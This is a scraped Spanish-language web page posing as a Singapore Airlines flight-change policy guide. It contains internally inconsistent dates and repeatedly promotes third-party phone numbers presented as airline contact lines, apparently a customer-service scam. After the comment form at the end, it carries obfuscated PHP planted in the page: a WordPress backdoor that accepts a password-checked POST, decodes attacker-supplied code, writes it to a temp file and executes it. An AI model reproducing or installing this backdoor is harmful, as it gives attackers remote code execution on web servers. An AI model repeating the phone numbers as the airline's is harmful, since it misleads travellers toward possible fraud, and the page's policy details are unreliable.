Home » Singapore Airlines Cambiar política de vuelo 1-877-406-5092

Singapore Airlines Cambiar política de vuelo 1-877-406-5092

¿Qué es la política de cambio de vuelo Singapore Airlines En 2023

La política de cambio de reserva de cortesía de Singapore Airlines se aplica a los boletos emitidos antes del 31 de julio de 2022

En respuesta a la situación de COVID-19, Singapore Airlines ofrece cambios de reserva gratuitos para todos los boletos aéreos emitidos el 31 de julio de 2022 o antes. Si su boleto se emitió el 31 de julio de 2022 o antes y no ha utilizado su boleto único renuncia a las tarifas de cambio de reserva, tiene la opción de cambiar la fecha de su vuelo y/o la hora del vuelo sin que se le cobre una tarifa por cambio de vuelo, siempre que pague la diferencia de tarifa (si corresponde).

También puede transferir cualquier complemento a su nuevo vuelo, como equipaje adicional, asientos, etc. si ya los ha comprado. Se le reembolsarán las ofertas adicionales que haya comprado para equipaje, asientos, etc., ya que no se pueden comprar.

Reglas de cambio de vuelo de Singapore Airlines

Las reglas de cambio de vuelo de Singapore Airlines le permiten realizar un cambio único de forma gratuita si su boleto se emitió el 31 de julio de 2022 o antes, siempre que pague la diferencia de tarifa aplicable (si corresponde).

Fecha de emisión del billeteLo que puedes hacer
En o antes del 31 de julio de 2022Vuelva a reservar una vez de forma gratuita si aún no ha utilizado su exención de tarifa única por cambio de reserva. Pague únicamente la diferencia de tarifa aplicable, si la hubiere.
5 de marzo de 2020—31 de mayo de 2022Realice cambios ilimitados en sus fechas de viaje antes del 31 de mayo de 2022, sin cargos por cambios. Después del 31 de mayo de 2022, puede realizar un cambio de cortesía único en las fechas de su viaje, siempre que lo haga dentro de 1 año a partir de la fecha de emisión de su boleto.

Las reglas de cambio de vuelo de Singapore Airlines permiten cambios de reserva gratuitos, bajo los cuales puede:

  • Realice un cambio único en su boleto sin pagar ningún cargo por cambio para boletos emitidos el 31 de julio de 2022 o antes, siempre que aún no haya utilizado su exención de cargo único.
  • Realice cambios ilimitados en las fechas de su viaje sin pagar ningún cargo por cambio para los boletos emitidos antes del 31 de mayo de 2022. Después del 31 de mayo de 2022, solo puede modificar sus fechas de viaje una vez de forma gratuita, pero dentro de 1 año a partir de la fecha de emisión de su boleto.

Nota

  • La nueva reserva gratuita se aplica tanto a los billetes comprados con efectivo/tarjeta de crédito/débito como a los billetes canjeados con KrisFlyer Miles.
  • Las reglas de cambio de vuelo establecen además que, aunque no se aplicarán las tarifas de cambio de reserva si es elegible para una nueva reserva de cortesía, debe, sin embargo, pagar la diferencia de tarifa, si corresponde.
  • Debe realizar cambios en su reserva de vuelo antes de la fecha de viaje original o dentro de 1 año a partir de la fecha de emisión de su boleto, lo que ocurra primero. Esto significa que si compró un boleto el 31 de julio de 2022, debe realizar los cambios de vuelo deseados antes del 31 de julio de 2023. Encontrará la fecha de emisión de su boleto en el boleto electrónico adjunto al correo de confirmación de su reserva.
  • Todos los cambios de vuelo deben realizarse al menos 2 horas antes de la hora de salida programada de un vuelo.

Nota. Si su boleto se emitió el 30 de mayo de 2022, debe realizar los cambios necesarios en su boleto antes del 30 de mayo de 2023 para calificar para la exención de la tarifa de viaje de Singapore Airlines. Una vez que haya realizado una solicitud de cambio, no necesita volver a enviarla en línea o a través de un número de contacto.

Cómo cambiar la fecha, la hora o el destino de un vuelo de Singapore Airlines

Singapore Airlines le permite cambiar la fecha, la hora y el destino de su vuelo con o sin cargo por cambio de vuelo, según las condiciones de la tarifa de su boleto.

  • Para cambiar la fecha de su viaje:
  • Vaya a Administrar reserva, seleccione Cambiar reserva, elija un nuevo vuelo y siga las indicaciones para cambiar su vuelo. Puede realizar cambios en línea solo si compró su boleto directamente de Singapore Airlines (sitio web, aplicación, oficina de ventas o centro de llamadas).
  • Llama al agente de viajes al que le compraste el billete.
  • Llame al +1-844-933-2065 o solicite su oficina local de Singapore Airlines.
  • Para cambiar su destino de viaje:
  • Llame al +1-844-933-2065 o a su oficina local de Singapore Airlines.
  • Llama al agente de viajes al que le compraste el billete.
  • Utilice el formulario de solicitud de asistencia.

Nota

Puede solicitar el reembolso de la parte no utilizada de su boleto si no puede viajar porque su vuelo está cancelado, una frontera internacional está cerrada o si su prueba de COVID-19 es positiva. Si compró complementos como equipaje adicional, asientos u otras ofertas complementarias, lo que puede hacer con ellos dependerá de si está cambiando la fecha de viaje o el destino:

  • Si está cambiando solo sus fechas de viaje
  • Puede transferir su equipaje adicional a su nuevo vuelo.
  • Puede transferir su opción de asiento a su nuevo vuelo si está disponible. De lo contrario, se le ofrecerá un reembolso completo.
  • Si compró una oferta adicional, puede solicitar un reembolso.
  • Si estás cambiando tu destino
  • Se puede reembolsar cualquier complemento que haya comprado, como equipaje adicional, asientos u otras ofertas.
  • Puede volver a comprar los complementos para su nuevo vuelo, como equipaje adicional, asientos, etc., sujeto a los precios vigentes y la disponibilidad.
  • Para comprar complementos, debe llamar al +1-844-933-2065 o a su oficina local de Singapore Airlines.

Singapore Airlines Reserve ahora, posponga la opción de viaje más tarde

Singapore Airlines ofrece mucha flexibilidad a los pasajeros que cambian su reserva de vuelo de forma gratuita. Puede reservar su boleto ahora y viajar en 2023 si su boleto se vuelve a emitir como se explica a continuación:

Paso 1. Supongamos que reserva su boleto en septiembre de 2021

Paso 1. Supongamos que reserva su boleto en septiembre de 2021

Paso 2. Entonces decides posponer tu viaje

Decide posponer su viaje hasta marzo de 2022 en octubre de 2021 porque su viaje es elegible para cambios complementarios ilimitados.

Paso 3. Decides volver a posponer tu viaje

Decide posponer su viaje nuevamente hasta agosto de 2022 en noviembre de 2021, porque su viaje es elegible para cambios complementarios ilimitados.

Paso 4. Pospones tu viaje una vez más

Decide posponer y cambiar su destino de viaje en julio de 2022. Aunque su período de cambio de reserva de cortesía ya terminó, aún puede realizar un cambio gratuito después del 31 de diciembre de 2021. Tendrá que pagar la diferencia de tarifa aplicable, dependiendo de su nuevo destino.

Recibirá un nuevo boleto basado en su nuevo itinerario con un nuevo período de validez que no exceda los 12 meses. Esto significa que ahora tiene la flexibilidad de posponer su viaje hasta julio de 2023. Cualquier cambio posterior estará sujeto a las tarifas de cambio aplicables.

¿Qué pasa si Singapore Airlines cambia mi vuelo?

Si Singapore Airlines cambia el horario de su vuelo o no opera de acuerdo con el horario, o le hace perder un vuelo de conexión de Singapore Airlines en el que tiene una reserva confirmada, tiene la opción de:

  1. Tome el próximo vuelo disponible que le ofrezca Singapore Airlines, o
  2. Elija la opción de viaje alternativa que ofrece Singapore Airlines, como vuelo de otra aerolínea, transporte terrestre, etc., sin costo adicional, incluso si el costo del viaje es mayor. Si la tarifa es más baja, se le reembolsará el saldo restante. O
  3. Solicite un reembolso sin penalización.

Términos y condiciones de cambio de vuelo

  • Se aplica a todos los boletos de Singapore Airlines emitidos el 31 de julio de 2022 o antes.
  • La opción se aplica a los cambios relacionados con el cambio de reserva y el cambio de ruta, siempre que se realicen al menos 2 horas antes de la salida de su vuelo.
  • Los cambios de vuelo estarán sujetos a diferencias tarifarias, dependiendo de las condiciones tarifarias de su boleto.
  • Debe completar su viaje durante el período de validez de su billete.
  • Si se vuelve a emitir su boleto original, el período de validez de su boleto se aplicará a partir de la fecha de reemisión de su boleto y estará sujeto a las condiciones de la nueva tarifa.
  • Las cancelaciones de vuelos dependerán de las condiciones de la tarifa de su billete.
  • La tarifa de cancelación no se aplicará si:
  • tu vuelo esta cancelado
  • Su vuelo se ve interrumpido debido al cierre de fronteras relacionado con el COVID-19
  • Das positivo por COVID-19
  • Si ha comprado complementos, como equipaje adicional y asientos:
  • Y está cambiando solo su fecha de viaje, su equipaje adicional y su opción de asiento se transferirán a su nuevo vuelo si está disponible o se cancelarán. Cualquier oferta adicional comprada por usted, incl. paquetes, serán reembolsados.
  • Si cambia el destino de su vuelo, se reembolsarán los complementos que haya comprado. Se deben comprar nuevos complementos, sujetos a los precios y la disponibilidad vigentes.

Cómo cambiar un billete de avión de Singapore Airlines

¿Puedo cambiar mi cambio de vuelo en Singapore Airlines?

Puede cambiar su vuelo de Singapore Airlines (es decir, fecha de viaje, hora y/o destino) como se explica a continuación.

  • Si desea cambiar solo su fecha de viaje, puede hacerlo:
  • En línea a través de la pestaña Administrar reserva de Singapore Airlines seleccionando un nuevo vuelo.
  • Llamando a la agencia de viajes con la que reservó su billete.
  • Llamando al +1-844-933-2065 o a su oficina local de Singapore Airlines.
  • Si desea cambiar el destino de su viaje, puede hacerlo:
  • Llamando al +1-844-933-2065 o a su oficina local de Singapore Airlines.
  • Llamando a la agencia de viajes con la que reservó su billete.

Cargo por cambio de vuelo de Singapore Airlines

¿Cuál es la tarifa de cambio de boleto de Singapore Airlines?

El cargo por cambio de vuelo que cobra Singapore Airlines dependerá de las condiciones de la tarifa de su boleto. Si su boleto no califica para una exención de viaje, las tarifas de cambio de vuelo pueden ser las siguientes:

  • Tarifas de vuelo por cambio de clase económica
  • El cargo por cambio de vuelo para los boletos elegibles de Clase Económica suele ser de USD 75.
  • Las tarifas Economy Flexi se pueden cambiar sin incurrir en ningún cargo por cambio de vuelo.
  • Debe realizar los cambios al menos 2 horas antes de la salida.
  • Debe pagar la diferencia aplicable en las tarifas.
  • Tarifas de cambio de vuelo de Premium Economy
  • El cargo por cambio de vuelo para boletos Premium Economy elegibles suele ser de USD 100.
  • Las tarifas flexibles se pueden cambiar sin incurrir en ningún cargo por cambio de vuelo.
  • Debe realizar los cambios al menos 2 horas antes de la salida.
  • Debe pagar la diferencia aplicable en las tarifas.
  • Tarifas de cambio de vuelo de clase ejecutiva
  • El cargo por cambio de vuelo para las tarifas elegibles de Business Class suele ser de 200 USD.
  • Las tarifas flexibles se pueden cambiar sin incurrir en ningún cargo por cambio de vuelo.
  • Debe realizar los cambios al menos 2 horas antes de la salida.
  • Debe pagar la diferencia aplicable en las tarifas.
  • Tarifas de cambio de vuelo de primera clase
  • La tarifa de cambio de vuelo para las tarifas de Primera clase suele ser de 500 USD.
  • Las tarifas flexibles se pueden cambiar sin incurrir en ningún cargo por cambio de vuelo.
  • Debe realizar los cambios de vuelo al menos 2 horas antes de la salida.
  • Debe pagar la diferencia aplicable en las tarifas.

Preguntas frecuentes sobre el cambio de reserva de vuelo de Singapore Airlines

¿Puedo cambiar mi vuelo con Singapore Airlines?

Puede cambiar la mayoría de los vuelos en Singapore Airlines, excepto las tarifas Economy Lite. Las tarifas flexibles se pueden cambiar sin incurrir en una tarifa por cambio de vuelo. Además, todos los boletos de avión emitidos el 31 de julio de 2022 o antes se pueden cambiar una vez sin incurrir en una tarifa por cambio de vuelo, siempre que no se haya aplicado la exención de tarifa única gratuita para ellos. Sin embargo, debe pagar la diferencia de tarifa aplicable si cambia la fecha, hora y/o destino del vuelo.

¿Cómo puedo hacer un cambio de fecha de vuelo en Singapore Airlines?

Puede realizar un cambio de fecha de vuelo en Singapore Airlines:
En línea a través de SingaporeAir.com si compró su boleto directamente de Singapore Airlines. Vaya a SingaporeAir.com, haga clic en la opción Administrar reserva y luego en Cambiar reserva. Luego seleccione un nuevo vuelo, siga las indicaciones para cambiar la fecha de su vuelo y confirme los cambios. Si hay una diferencia de tarifa, deberá pagarla, después de lo cual recibirá un correo de confirmación.
A través de la aplicación móvil SQ.
Por teléfono llamando al agente de viajes donde compró su boleto.
Por teléfono llamando al +1-844-933-2065 o a su oficina local de Singapore Airlines.
Visitando un aeropuerto/mostrador de ventas de Singapore Airlines.

¿Cómo puedo cambiar la fecha de un vuelo de regreso en Singapore Airlines?

Puede cambiar la fecha de un vuelo de regreso en Singapore Airlines:
En línea a través de SingaporeAir.com (Gestionar reserva 🡪 Cambiar reserva) o a través de la aplicación móvil SQ.
Llamando a la agencia de viajes donde compró su billete.
Llamando al +1-844-933-2065 o a su oficina local de Singapore Airlines.
Visitando un aeropuerto/mostrador de ventas de Singapore Airlines.

¿Cómo puedo cambiar un vuelo en Singapore Airlines?

Si compró un boleto directamente de Singapore Airlines, puede cambiar su vuelo en línea a través de la opción Administrar reserva (haga clic en Cambiar reserva y siga las indicaciones). Si compró su boleto a través de un agente de viajes, debe comunicarse con ellos directamente. También puede realizar los cambios llamando al +1-844-933-2065 o a la oficina de Singapore Airlines más cercana.

¿Puedo cambiar la fecha de mi vuelo en Singapore Airlines?

Sí, puede cambiar la fecha de un vuelo en el sitio web oficial de Singapore Airlines, SingaporeAir.com. Si su vuelo está cubierto por la exención de viaje COVID-19, puede hacerlo de forma gratuita. De lo contrario, se aplicará un cargo por cambio de vuelo, sujeto a las reglas de tarifa de su boleto.

¿Cómo puedo cambiar la fecha de vuelo en línea en Singapore Airlines?

Puede cambiar la fecha del boleto de vuelo en línea en Singapore Airlines de la siguiente manera:
Ir a SingaporeAir.com
Haga clic en la pestaña Administrar reserva
Haga clic en Cambiar vuelo
Seleccione un nuevo vuelo y fecha de vuelo
Confirmar los cambios
Pagar la diferencia de tarifa (si la hay)
Recibirá un correo de confirmación después de pagar.

Leave a Reply

Your email address will not be published. Required fields are marked *

¡Llámanos ahora!

+1-877-406-5092
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}